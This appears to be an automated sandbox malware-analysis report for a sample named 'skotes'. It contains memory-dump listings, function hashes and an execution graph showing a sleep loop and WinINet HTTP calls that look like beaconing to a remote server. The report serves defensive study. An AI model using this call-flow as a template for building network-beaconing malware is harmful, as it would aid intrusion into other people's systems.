                                                                                                                                                                                            • Instruction ID: 2f7fd2fbb289bced53943726b9d32a988de8dd5284a265e1c52b78e70dfc5fd8
                                                                                                                                                                                            • Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
                                                                                                                                                                                            • Instruction Fuzzy Hash: BFB1F1329046459FDB158F28C881BEEBBE6EF45360F1481AAF855FB342D6349D02CBE4
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 531285432-0
                                                                                                                                                                                            • Opcode ID: 788857502569266e4e34f30d7cc33a4648aa9b30001faad5ddf1828443daff9b
                                                                                                                                                                                            • Instruction ID: ccbbca7c78ab97efd50f4524d85e100dac163a3ca18e9bb6e7c3463646cb7574
                                                                                                                                                                                            • Opcode Fuzzy Hash: 788857502569266e4e34f30d7cc33a4648aa9b30001faad5ddf1828443daff9b
                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A213271A00219AFDF00EFA4DC859FEB7BAEF08724F145059F501B7251DB349D819BA5
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 00000002.00000002.1486178970.0000000000601000.00000040.00000001.01000000.00000007.sdmp, Offset: 00600000, based on PE: true
                                                                                                                                                                                            • Associated: 00000002.00000002.1486079645.0000000000600000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486178970.0000000000662000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486598692.0000000000669000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486617811.000000000066B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486658352.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486673887.0000000000676000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486691158.0000000000677000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486798163.00000000007CE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486817828.00000000007D0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486843858.00000000007E5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486863331.00000000007E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486882263.00000000007F1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486915608.00000000007F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486930876.00000000007F6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486945694.00000000007F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486965787.00000000007FA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486983847.00000000007FB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1486999480.00000000007FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487025692.000000000080D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487043861.000000000080E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487065166.0000000000823000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487083690.0000000000824000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487110165.000000000082E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487128440.0000000000839000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487149781.000000000084E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487167064.0000000000852000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487185341.000000000085B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487204949.0000000000860000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487230454.0000000000866000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487247568.0000000000867000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487264556.0000000000868000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487284342.000000000086A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487302608.0000000000875000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487320510.000000000087A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487339666.0000000000881000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487356200.0000000000883000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487371192.0000000000884000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487386011.0000000000886000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487401136.0000000000887000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487416008.000000000088C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487430765.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487445085.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487466619.00000000008A2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487484405.00000000008A3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487503324.00000000008A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487520463.00000000008A5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487540232.00000000008B2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487556831.00000000008B4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487573270.00000000008B5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008B6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487589441.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487635756.0000000000901000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487650878.0000000000902000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487671613.0000000000907000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487688557.0000000000909000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487711172.0000000000917000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            • Associated: 00000002.00000002.1487727174.0000000000918000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_600000_skotes.jbxd
                                                                                                                                                                                            Yara matches
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ___free_lconv_mon
                                                                                                                                                                                            • String ID: 8"f$`'f
                                                                                                                                                                                            • API String ID: 3903695350-1130731482
                                                                                                                                                                                            • Opcode ID: 644070977ac575a2815b7defa0f494eb272241ec5831c70935fd535126d1ed3d
                                                                                                                                                                                            • Instruction ID: cc1a5b750d20d97ef243a7873d12a16a00952ca4722cdd354e364fb38f4b8b3b
                                                                                                                                                                                            • Opcode Fuzzy Hash: 644070977ac575a2815b7defa0f494eb272241ec5831c70935fd535126d1ed3d
                                                                                                                                                                                            • Instruction Fuzzy Hash: B4316D32A00601DFEB61AB79D845B9B77EAEF00351F10442EF085D7696DF71AC80DB95

                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                            Execution Coverage:6%
                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                            Signature Coverage:4.4%
                                                                                                                                                                                            Total number of Nodes:833
                                                                                                                                                                                            Total number of Limit Nodes:49
                                                                                                                                                                                            execution_graph 37316 616d00 CreateThread 37317 616d20 Sleep 37316->37317 37318 616c70 37316->37318 37317->37317 37321 616ca0 37318->37321 37319 617a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37319->37321 37320 605c10 GetPEB RtlAllocateHeap GetPEB RtlAllocateHeap 37320->37321 37321->37319 37321->37320 37324 6147b0 37321->37324 37323 616cec Sleep 37323->37321 37325 6147eb 37324->37325 37328 614e70 Hash Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37324->37328 37325->37328 37421 617a00 37325->37421 37327 61480c 37432 605c10 37327->37432 37328->37323 37330 614813 37331 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37330->37331 37332 614825 37331->37332 37333 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37332->37333 37334 614837 37333->37334 37439 60be30 37334->37439 37336 614843 37337 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37336->37337 37338 614858 37337->37338 37339 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37338->37339 37340 614870 37339->37340 37341 605c10 4 API calls 37340->37341 37342 614877 37341->37342 37463 608580 37342->37463 37344 614883 37345 614afd 37344->37345 37346 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37344->37346 37347 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37345->37347 37399 614f9c 37345->37399 37348 61489f 37346->37348 37349 614b2f 37347->37349 37350 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37348->37350 37351 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37349->37351 37352 6148b7 37350->37352 37353 614b44 37351->37353 37354 605c10 4 API calls 37352->37354 37355 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37353->37355 37356 6148be 37354->37356 37357 614b56 37355->37357 37359 608580 RtlAllocateHeap 37356->37359 37358 60be30 10 API calls 37357->37358 37361 614b62 37358->37361 37360 6148ca 37359->37360 37360->37345 37363 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37360->37363 37362 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37361->37362 37364 614b77 37362->37364 37365 6148e7 37363->37365 37366 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37364->37366 37367 605c10 4 API calls 37365->37367 37368 614b8f 37366->37368 37372 6148ef 37367->37372 37369 605c10 4 API calls 37368->37369 37370 614b96 37369->37370 37371 608580 RtlAllocateHeap 37370->37371 37373 614ba2 37371->37373 37374 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37372->37374 37373->37328 37375 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37373->37375 37382 614959 Hash 37374->37382 37376 614bbe 37375->37376 37377 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37376->37377 37378 614bd6 37377->37378 37380 605c10 4 API calls 37378->37380 37379 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37383 6149e6 37379->37383 37381 614bdd 37380->37381 37384 608580 RtlAllocateHeap 37381->37384 37382->37379 37385 605c10 4 API calls 37383->37385 37386 614be9 37384->37386 37388 6149ee 37385->37388 37386->37328 37387 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37386->37387 37389 614c06 37387->37389 37390 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37388->37390 37391 605c10 4 API calls 37389->37391 37392 614a49 Hash 37390->37392 37393 614c0e 37391->37393 37392->37345 37500 6098f0 37392->37500 37395 614f97 37393->37395 37396 614c5a 37393->37396 37509 618200 RtlAllocateHeap 37395->37509 37469 6180c0 37396->37469 37510 61c1d9 RtlAllocateHeap std::invalid_argument::invalid_argument Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37399->37510 37401 614ad5 __dosmaperr 37401->37345 37505 638ab6 37401->37505 37403 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37405 614d05 37403->37405 37404 614c78 Hash 37404->37328 37404->37403 37406 605c10 4 API calls 37405->37406 37407 614d0d 37406->37407 37408 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37407->37408 37411 614d68 Hash 37408->37411 37409 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37410 614df7 37409->37410 37412 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37410->37412 37411->37328 37411->37409 37413 614e0c 37412->37413 37414 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37413->37414 37415 614e27 37414->37415 37416 605c10 4 API calls 37415->37416 37417 614e2e 37416->37417 37418 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37417->37418 37419 614e67 37418->37419 37482 614390 37419->37482 37422 617a26 37421->37422 37423 617a2d 37422->37423 37424 617a81 37422->37424 37425 617a62 37422->37425 37423->37327 37430 61d3e2 ListArray RtlAllocateHeap 37424->37430 37431 617a6f 6 library calls 37424->37431 37426 617ab9 37425->37426 37427 617a69 37425->37427 37519 602480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37426->37519 37511 61d3e2 37427->37511 37430->37431 37431->37327 37525 605940 37432->37525 37436 605c6a 37544 604b30 37436->37544 37438 605c7b Hash Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37438->37330 37440 60c281 37439->37440 37441 60be82 37439->37441 37442 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37440->37442 37441->37440 37443 60be96 Sleep InternetOpenW InternetConnectA 37441->37443 37449 60c22e Hash Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37442->37449 37444 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37443->37444 37445 60bf18 37444->37445 37446 605c10 4 API calls 37445->37446 37447 60bf23 HttpOpenRequestA 37446->37447 37450 60bf4c Hash 37447->37450 37449->37336 37451 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37450->37451 37452 60bfb4 37451->37452 37453 605c10 4 API calls 37452->37453 37454 60bfbf 37453->37454 37455 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37454->37455 37456 60bfd8 37455->37456 37457 605c10 4 API calls 37456->37457 37458 60bfe3 HttpSendRequestA 37457->37458 37460 60c006 Hash 37458->37460 37461 60c08e InternetReadFile 37460->37461 37462 60c0b5 __InternalCxxFrameHandler 37461->37462 37467 6086a0 Hash Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37463->37467 37468 6085d5 Hash 37463->37468 37464 608767 37558 618200 RtlAllocateHeap 37464->37558 37465 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37465->37468 37467->37344 37468->37464 37468->37465 37468->37467 37472 6180de __InternalCxxFrameHandler 37469->37472 37473 618104 37469->37473 37471 6181f3 37560 602480 RtlAllocateHeap ___std_exception_copy Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37471->37560 37472->37404 37475 618158 37473->37475 37476 61817d 37473->37476 37480 618169 Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37473->37480 37475->37471 37478 61d3e2 ListArray RtlAllocateHeap 37475->37478 37479 61d3e2 ListArray RtlAllocateHeap 37476->37479 37476->37480 37477 6181f8 37478->37480 37479->37480 37481 6181d0 Hash 37480->37481 37559 619270 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37480->37559 37481->37404 37483 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37482->37483 37484 6143d2 37483->37484 37485 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37484->37485 37486 6143e4 37485->37486 37487 608580 RtlAllocateHeap 37486->37487 37488 6143ed 37487->37488 37489 614646 37488->37489 37498 6143f8 Hash 37488->37498 37490 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37489->37490 37491 614657 37490->37491 37492 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37491->37492 37493 61466c 37492->37493 37494 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37493->37494 37495 614610 Hash __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37494->37495 37495->37328 37497 617a00 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37497->37498 37498->37495 37498->37497 37499 6180c0 RtlAllocateHeap Concurrency::details::_CancellationTokenState::_RegisterCallback 37498->37499 37561 619280 37498->37561 37499->37498 37501 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37500->37501 37502 60991e 37501->37502 37503 605c10 4 API calls 37502->37503 37504 609927 Hash ListArray Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37503->37504 37504->37401 37506 638ad1 37505->37506 37567 638868 37506->37567 37508 638adb 37508->37345 37510->37328 37514 61d3e7 ListArray 37511->37514 37513 61d401 37513->37431 37514->37513 37516 602480 Concurrency::details::_CancellationTokenState::_RegisterCallback Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37514->37516 37520 638be1 37514->37520 37515 61d40d Concurrency::details::_Condition_variable::wait_for Concurrency::details::ScheduleGroupSegmentBase::ScheduleTask 37516->37515 37524 6338af RtlAllocateHeap ___std_exception_copy 37516->37524 37518 6024c3 37518->37431 37519->37431 37523 63b04b ListArray __dosmaperr 37520->37523 37521 63b074 RtlAllocateHeap 37522 63b087 __dosmaperr 37521->37522 37521->37523 37522->37514 37523->37521 37523->37522 37524->37518 37551 617f80 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback 37525->37551 37527 60596b 37528 6059e0 37527->37528 37552 617f80 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback 37528->37552 37530 617a00 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37542 605a45 37530->37542 37531 605c09 37554 618200 RtlAllocateHeap 37531->37554 37532 605bdd __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37532->37436 37534 6180c0 Concurrency::details::_CancellationTokenState::_RegisterCallback RtlAllocateHeap 37534->37542 37542->37530 37542->37531 37542->37532 37542->37534 37553 605730 RtlAllocateHeap Hash Concurrency::details::_CancellationTokenState::_RegisterCallback __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 37542->37553 37545 604dc2 37544->37545 37546 604b92 37544->37546 37545->37438 37548 604ce5 37546->37548 37555 636da6 GetPEB GetPEB RtlAllocateHeap __fassign 37546->37555 37556 618ca0 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37546->37556 37548->37545 37557 618ca0 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37548->37557 37551->37527 37552->37542 37553->37542 37555->37546 37556->37546 37557->37548 37560->37477 37562 619294 37561->37562 37565 6192a5 __InternalCxxFrameHandler std::_Rethrow_future_exception 37562->37565 37566 6194e0 RtlAllocateHeap ListArray Hash Concurrency::details::_CancellationTokenState::_RegisterCallback std::_Rethrow_future_exception 37562->37566 37564 61932b 37564->37498 37565->37498 37566->37564 37568 63887a 37567->37568 37572 63888f __dosmaperr ___std_exception_copy 37568->37572 